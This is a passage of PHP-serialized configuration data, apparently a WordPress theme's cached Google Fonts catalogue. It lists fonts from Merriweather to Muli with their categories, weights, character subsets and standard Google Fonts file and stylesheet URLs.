MqxEwPfh2qDWBPxn6nqcQoVhARpoaILP7amxE_8g.ttf";s:9:"300italic";s:91:"http://fonts.gstatic.com/s/merriweather/v13/EYh7Vl4ywhowqULgRdYwICna0FLWfcB-J_SAYmcAXaI.ttf";s:7:"regular";s:91:"http://fonts.gstatic.com/s/merriweather/v13/RFda8w1V0eDZheqfcyQ4EC3USBnSvpkopQaUR-2r7iU.ttf";s:6:"italic";s:91:"http://fonts.gstatic.com/s/merriweather/v13/So5lHxHT37p2SS4-t60SlPMZXuCXbOrAvx5R0IT5Oyo.ttf";i:700;s:91:"http://fonts.gstatic.com/s/merriweather/v13/ZvcMqxEwPfh2qDWBPxn6nkD2ttfZwueP-QU272T9-k4.ttf";s:9:"700italic";s:91:"http://fonts.gstatic.com/s/merriweather/v13/EYh7Vl4ywhowqULgRdYwIPAs9-1nE9qOqhChW0m4nDE.ttf";i:900;s:91:"http://fonts.gstatic.com/s/merriweather/v13/ZvcMqxEwPfh2qDWBPxn6nqObDOjC3UL77puoeHsE3fw.ttf";s:9:"900italic";s:91:"http://fonts.gstatic.com/s/merriweather/v13/EYh7Vl4ywhowqULgRdYwIBd0_s6jQr9r5s5OZYvtzBY.ttf";}s:4:"urls";a:8:{i:300;s:56:"https://fonts.googleapis.com/css?family=Merriweather:300";s:9:"300italic";s:62:"https://fonts.googleapis.com/css?family=Merriweather:300italic";s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Merriweather:regular";s:6:"italic";s:59:"https://fonts.googleapis.com/css?family=Merriweather:italic";i:700;s:56:"https://fonts.googleapis.com/css?family=Merriweather:700";s:9:"700italic";s:62:"https://fonts.googleapis.com/css?family=Merriweather:700italic";i:900;s:56:"https://fonts.googleapis.com/css?family=Merriweather:900";s:9:"900italic";s:62:"https://fonts.googleapis.com/css?family=Merriweather:900italic";}}s:17:"merriweather_sans";a:7:{s:4:"name";s:17:"Merriweather Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:8:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"700";i:5;s:9:"700italic";i:6;s:3:"800";i:7;s:9:"800italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:8:{i:300;s:94:"http://fonts.gstatic.com/s/merriweathersans/v8/6LmGj5dOJopQKEkt88Gowan5N8K-_DP0e9e_v51obXQ.ttf";s:9:"300italic";s:94:"http://fonts.gstatic.com/s/merriweathersans/v8/nAqt4hiqwq3tzCecpgPmVdytE4nGXk2hYD5nJ740tBw.ttf";s:7:"regular";s:94:"http://fonts.gstatic.com/s/merriweathersans/v8/AKu1CjQ4qnV8MUltkAX3sOAj_ty82iuwwDTNEYXGiyQ.ttf";s:6:"italic";s:94:"http://fonts.gstatic.com/s/merriweathersans/v8/3Mz4hOHzs2npRMG3B1ascZ32VBCoA_HLsn85tSWZmdo.ttf";i:700;s:94:"http://fonts.gstatic.com/s/merriweathersans/v8/6LmGj5dOJopQKEkt88GowbqxG25nQNOioCZSK4sU-CA.ttf";s:9:"700italic";s:94:"http://fonts.gstatic.com/s/merriweathersans/v8/nAqt4hiqwq3tzCecpgPmVbuqAJxizi8Dk_SK5et7kMg.ttf";i:800;s:94:"http://fonts.gstatic.com/s/merriweathersans/v8/6LmGj5dOJopQKEkt88GowYufzO2zUYSj5LqoJ3UGkco.ttf";s:9:"800italic";s:94:"http://fonts.gstatic.com/s/merriweathersans/v8/nAqt4hiqwq3tzCecpgPmVdDmPrYMy3aZO4LmnZsxTQw.ttf";}s:4:"urls";a:8:{i:300;s:61:"https://fonts.googleapis.com/css?family=Merriweather+Sans:300";s:9:"300italic";s:67:"https://fonts.googleapis.com/css?family=Merriweather+Sans:300italic";s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Merriweather+Sans:regular";s:6:"italic";s:64:"https://fonts.googleapis.com/css?family=Merriweather+Sans:italic";i:700;s:61:"https://fonts.googleapis.com/css?family=Merriweather+Sans:700";s:9:"700italic";s:67:"https://fonts.googleapis.com/css?family=Merriweather+Sans:700italic";i:800;s:61:"https://fonts.googleapis.com/css?family=Merriweather+Sans:800";s:9:"800italic";s:67:"https://fonts.googleapis.com/css?family=Merriweather+Sans:800italic";}}s:5:"metal";a:7:{s:4:"name";s:5:"Metal";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/metal/v9/zA3UOP13ooQcxjv04BZX5g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Metal:regular";}}s:11:"metal_mania";a:7:{s:4:"name";s:11:"Metal Mania";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/metalmania/v6/isriV_rAUgj6bPWPN6l9QKCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Metal+Mania:regular";}}s:12:"metamorphous";a:7:{s:4:"name";s:12:"Metamorphous";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/metamorphous/v6/wGqUKXRinIYggz-BTRU9ei3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Metamorphous:regular";}}s:11:"metrophobic";a:7:{s:4:"name";s:11:"Metrophobic";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/metrophobic/v8/SaglWZWCrrv_D17u1i4v_aCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Metrophobic:regular";}}s:8:"michroma";a:7:{s:4:"name";s:8:"Michroma";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/michroma/v7/0c2XrW81_QsiKV8T9thumA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Michroma:regular";}}s:7:"milonga";a:7:{s:4:"name";s:7:"Milonga";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/milonga/v4/dzNdIUSTGFmy2ahovDRcWg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Milonga:regular";}}s:9:"miltonian";a:7:{s:4:"name";s:9:"Miltonian";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:67:"http://fonts.gstatic.com/s/miltonian/v10/Z4HrYZyqm0BnNNzcCUfzoQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Miltonian:regular";}}s:16:"miltonian_tattoo";a:7:{s:4:"name";s:16:"Miltonian Tattoo";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:94:"http://fonts.gstatic.com/s/miltoniantattoo/v11/1oU_8OGYwW46eh02YHydn2uk0YtI6thZkz1Hmh-odwg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Miltonian+Tattoo:regular";}}s:7:"miniver";a:7:{s:4:"name";s:7:"Miniver";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/miniver/v5/4yTQohOH_cWKRS5laRFhYg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Miniver:regular";}}s:12:"miriam_libre";a:7:{s:4:"name";s:12:"Miriam Libre";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:6:"hebrew";}s:5:"files";a:2:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/miriamlibre/v1/Ljtpu8zR5iJWmlN3Faba5S3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:89:"http://fonts.gstatic.com/s/miriamlibre/v1/FLc0J-Gdn8ynDWUkeeesAED2ttfZwueP-QU272T9-k4.ttf";}s:4:"urls";a:2:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Miriam+Libre:regular";i:700;s:56:"https://fonts.googleapis.com/css?family=Miriam+Libre:700";}}s:5:"mirza";a:7:{s:4:"name";s:5:"Mirza";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:3:"500";i:2;s:3:"600";i:3;s:3:"700";}s:7:"subsets";a:3:{i:0;s:6:"arabic";i:1;s:5:"latin";i:2;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/mirza/v1/8oe36Xbgj9BMSLJBaZ8VAQ.ttf";i:500;s:62:"http://fonts.gstatic.com/s/mirza/v1/dT3HbZoBCx1xbU7PnFEFyQ.ttf";i:600;s:62:"http://fonts.gstatic.com/s/mirza/v1/6T4uh2Zti9P6Eq_gbAYvVQ.ttf";i:700;s:62:"http://fonts.gstatic.com/s/mirza/v1/b47CZDHoZdhnplmDpZymFw.ttf";}s:4:"urls";a:4:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Mirza:regular";i:500;s:49:"https://fonts.googleapis.com/css?family=Mirza:500";i:600;s:49:"https://fonts.googleapis.com/css?family=Mirza:600";i:700;s:49:"https://fonts.googleapis.com/css?family=Mirza:700";}}s:14:"miss_fajardose";a:7:{s:4:"name";s:14:"Miss Fajardose";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/missfajardose/v6/WcXjlQPKn6nBfr8LY3ktNu6rPKfVZo7L2bERcf0BDns.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Miss+Fajardose:regular";}}s:4:"mitr";a:7:{s:4:"name";s:4:"Mitr";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"500";i:4;s:3:"600";i:5;s:3:"700";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:4:"thai";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:6:{i:200;s:61:"http://fonts.gstatic.com/s/mitr/v1/GCzZRAhweqJhxrmM0bPztg.ttf";i:300;s:61:"http://fonts.gstatic.com/s/mitr/v1/A61rQ_y9i8Ja__oFN7KxiQ.ttf";s:7:"regular";s:61:"http://fonts.gstatic.com/s/mitr/v1/vKMd72X2iT4iBo5GvdCa_A.ttf";i:500;s:61:"http://fonts.gstatic.com/s/mitr/v1/r_Z6yrJJ0zmkGAqxqjlLRg.ttf";i:600;s:61:"http://fonts.gstatic.com/s/mitr/v1/42l66tb_XMxM97GKatU9Ng.ttf";i:700;s:61:"http://fonts.gstatic.com/s/mitr/v1/V-V7Rul5HOZ651R4Tml2Lw.ttf";}s:4:"urls";a:6:{i:200;s:48:"https://fonts.googleapis.com/css?family=Mitr:200";i:300;s:48:"https://fonts.googleapis.com/css?family=Mitr:300";s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Mitr:regular";i:500;s:48:"https://fonts.googleapis.com/css?family=Mitr:500";i:600;s:48:"https://fonts.googleapis.com/css?family=Mitr:600";i:700;s:48:"https://fonts.googleapis.com/css?family=Mitr:700";}}s:5:"modak";a:7:{s:4:"name";s:5:"Modak";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/modak/v2/lMsN0QIKid-pCPvL0hH4nw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Modak:regular";}}s:14:"modern_antiqua";a:7:{s:4:"name";s:14:"Modern Antiqua";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/modernantiqua/v6/8qX_tr6Xzy4t9fvZDXPkh6rFJ4O13IHVxZbM6yoslpo.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Modern+Antiqua:regular";}}s:5:"mogra";a:7:{s:4:"name";s:5:"Mogra";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:8:"gujarati";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/mogra/v1/gIxQBn9PseDaI0D4FnOiBQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Mogra:regular";}}s:7:"molengo";a:7:{s:4:"name";s:7:"Molengo";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/molengo/v7/jcjgeGuzv83I55AzOTpXNQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Molengo:regular";}}s:5:"molle";a:7:{s:4:"name";s:5:"Molle";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:6:"italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:6:"italic";s:62:"http://fonts.gstatic.com/s/molle/v4/9XTdCsjPXifLqo5et-YoGA.ttf";}s:4:"urls";a:1:{s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Molle:italic";}}s:5:"monda";a:7:{s:4:"name";s:5:"Monda";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/monda/v6/qFMHZ9zvR6B_gnoIgosPrw.ttf";i:700;s:62:"http://fonts.gstatic.com/s/monda/v6/EVOzZUyc_j1w2GuTgTAW1g.ttf";}s:4:"urls";a:2:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Monda:regular";i:700;s:49:"https://fonts.googleapis.com/css?family=Monda:700";}}s:8:"monofett";a:7:{s:4:"name";s:8:"Monofett";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/monofett/v6/C6K5L799Rgxzg2brgOaqAw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Monofett:regular";}}s:7:"monoton";a:7:{s:4:"name";s:7:"Monoton";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/monoton/v6/aCz8ja_bE4dg-7agSvExdw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Monoton:regular";}}s:20:"monsieur_la_doulaise";a:7:{s:4:"name";s:20:"Monsieur La Doulaise";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:96:"http://fonts.gstatic.com/s/monsieurladoulaise/v5/IMAdMj6Eq9jZ46CPctFtMKP61oAqTJXlx5ZVOBmcPdM.ttf";}s:4:"urls";a:1:{s:7:"regular";s:68:"https://fonts.googleapis.com/css?family=Monsieur+La+Doulaise:regular";}}s:7:"montaga";a:7:{s:4:"name";s:7:"Montaga";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/montaga/v4/PwTwUboiD-M4-mFjZfJs2A.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Montaga:regular";}}s:6:"montez";a:7:{s:4:"name";s:6:"Montez";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/montez/v6/kx58rLOWQQLGFM4pDHv5Ng.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Montez:regular";}}s:10:"montserrat";a:7:{s:4:"name";s:10:"Montserrat";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/montserrat/v7/Kqy6-utIpx_30Xzecmeo8_esZW2xOQ-xsNqO47m55DA.ttf";i:700;s:88:"http://fonts.gstatic.com/s/montserrat/v7/IQHow_FEYlDC4Gzy_m8fcgJKKGfqHaYFsRG-T3ceEVo.ttf";}s:4:"urls";a:2:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Montserrat:regular";i:700;s:54:"https://fonts.googleapis.com/css?family=Montserrat:700";}}s:21:"montserrat_alternates";a:7:{s:4:"name";s:21:"Montserrat Alternates";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:98:"http://fonts.gstatic.com/s/montserratalternates/v4/z2n1Sjxk9souK3HCtdHuklPuEVRGaG9GCQnmM16YWq0.ttf";i:700;s:98:"http://fonts.gstatic.com/s/montserratalternates/v4/YENqOGAVzwIHjYNjmKuAZpeqBKvsAhm-s2I4RVSXFfc.ttf";}s:4:"urls";a:2:{s:7:"regular";s:69:"https://fonts.googleapis.com/css?family=Montserrat+Alternates:regular";i:700;s:65:"https://fonts.googleapis.com/css?family=Montserrat+Alternates:700";}}s:20:"montserrat_subrayada";a:7:{s:4:"name";s:20:"Montserrat Subrayada";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:97:"http://fonts.gstatic.com/s/montserratsubrayada/v4/nzoCWCz0e9c7Mr2Gl8bbgrJymm6ilkk9f0nDA_sC_qk.ttf";i:700;s:97:"http://fonts.gstatic.com/s/montserratsubrayada/v4/wf-IKpsHcfm0C9uaz9IeGJvEcF1LWArDbGWgKZSH9go.ttf";}s:4:"urls";a:2:{s:7:"regular";s:68:"https://fonts.googleapis.com/css?family=Montserrat+Subrayada:regular";i:700;s:64:"https://fonts.googleapis.com/css?family=Montserrat+Subrayada:700";}}s:4:"moul";a:7:{s:4:"name";s:4:"Moul";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/moul/v8/Kb0ALQnfyXawP1a_P_gpTQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Moul:regular";}}s:8:"moulpali";a:7:{s:4:"name";s:8:"Moulpali";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/moulpali/v9/diD74BprGhmVkJoerKmrKA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Moulpali:regular";}}s:22:"mountains_of_christmas";a:7:{s:4:"name";s:22:"Mountains of Christmas";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:98:"http://fonts.gstatic.com/s/mountainsofchristmas/v8/dVGBFPwd6G44IWDbQtPew2Auds3jz1Fxb61CgfaGDr4.ttf";i:700;s:98:"http://fonts.gstatic.com/s/mountainsofchristmas/v8/PymufKtHszoLrY0uiAYKNM9cPTbSBTrQyTa5TWAe3vE.ttf";}s:4:"urls";a:2:{s:7:"regular";s:70:"https://fonts.googleapis.com/css?family=Mountains+of+Christmas:regular";i:700;s:66:"https://fonts.googleapis.com/css?family=Mountains+of+Christmas:700";}}s:13:"mouse_memoirs";a:7:{s:4:"name";s:13:"Mouse Memoirs";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/mousememoirs/v4/NBFaaJFux_j0AQbAsW3QeH8f0n03UdmQgF_CLvNR2vg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Mouse+Memoirs:regular";}}s:10:"mr_bedfort";a:7:{s:4:"name";s:10:"Mr Bedfort";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/mrbedfort/v5/81bGgHTRikLs_puEGshl7_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Mr+Bedfort:regular";}}s:8:"mr_dafoe";a:7:{s:4:"name";s:8:"Mr Dafoe";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/mrdafoe/v5/s32Q1S6ZkT7EaX53mUirvQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Mr+Dafoe:regular";}}s:14:"mr_de_haviland";a:7:{s:4:"name";s:14:"Mr De Haviland";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/mrdehaviland/v5/fD8y4L6PJ4vqDk7z8Y8e27v4lrhng1lzu7-weKO6cw8.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Mr+De+Haviland:regular";}}s:19:"mrs_saint_delafield";a:7:{s:4:"name";s:19:"Mrs Saint Delafield";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:95:"http://fonts.gstatic.com/s/mrssaintdelafield/v4/vuWagfFT7bj9lFtZOFBwmjHMBelqWf3tJeGyts2SmKU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:67:"https://fonts.googleapis.com/css?family=Mrs+Saint+Delafield:regular";}}s:13:"mrs_sheppards";a:7:{s:4:"name";s:13:"Mrs Sheppards";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/mrssheppards/v5/2WFsWMV3VUeCz6UVH7UjCn8f0n03UdmQgF_CLvNR2vg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Mrs+Sheppards:regular";}}s:11:"mukta_vaani";a:7:{s:4:"name";s:11:"Mukta Vaani";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:7:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"500";i:4;s:3:"600";i:5;s:3:"700";i:6;s:3:"800";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:8:"gujarati";i:2;s:9:"latin-ext";}s:5:"files";a:7:{i:200;s:88:"http://fonts.gstatic.com/s/muktavaani/v1/X9qyC4rK_D9w1AvSv0mw_0nzyIngrzGjGh22wPb6cGM.ttf";i:300;s:88:"http://fonts.gstatic.com/s/muktavaani/v1/X9qyC4rK_D9w1AvSv0mw_y9-WlPSxbfiI49GsXo3q0g.ttf";s:7:"regular";s:88:"http://fonts.gstatic.com/s/muktavaani/v1/knS0wTOFNOwOD4CZrdHIxKCWcynf_cDxXwCLxiixG1c.ttf";i:500;s:88:"http://fonts.gstatic.com/s/muktavaani/v1/X9qyC4rK_D9w1AvSv0mw_8CNfqCYlB_eIx7H1TVXe60.ttf";i:600;s:88:"http://fonts.gstatic.com/s/muktavaani/v1/X9qyC4rK_D9w1AvSv0mw_5Z7xm-Bj30Bj2KNdXDzSZg.ttf";i:700;s:88:"http://fonts.gstatic.com/s/muktavaani/v1/X9qyC4rK_D9w1AvSv0mw_3e1Pd76Vl7zRpE7NLJQ7XU.ttf";i:800;s:88:"http://fonts.gstatic.com/s/muktavaani/v1/X9qyC4rK_D9w1AvSv0mw_w89PwPrYLaRFJ-HNCU9NbA.ttf";}s:4:"urls";a:7:{i:200;s:55:"https://fonts.googleapis.com/css?family=Mukta+Vaani:200";i:300;s:55:"https://fonts.googleapis.com/css?family=Mukta+Vaani:300";s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Mukta+Vaani:regular";i:500;s:55:"https://fonts.googleapis.com/css?family=Mukta+Vaani:500";i:600;s:55:"https://fonts.googleapis.com/css?family=Mukta+Vaani:600";i:700;s:55:"https://fonts.googleapis.com/css?family=Mukta+Vaani:700";i:800;s:55:"https://fonts.googleapis.com/css?family=Mukta+Vaani:800";}}s:4:"muli";a:7:{s:4:"name";s:4:"Muli";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:7:"regular";i:3;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{i:300;s:61:"http://fonts.gstatic.com/s/muli/v9/VJw4F3ZHRAZ7Hmg3nQu5YQ.ttf";s:9:"300italic";s:61:"http://fonts.gstatic.com/s/muli/v9/s-NKMCru8HiyjEt0ZDoBoA.ttf";s:7:"regular";s:61:"http://fonts.gstatic.com/s/muli/v9/KJiP6KznxbALQgfJcDd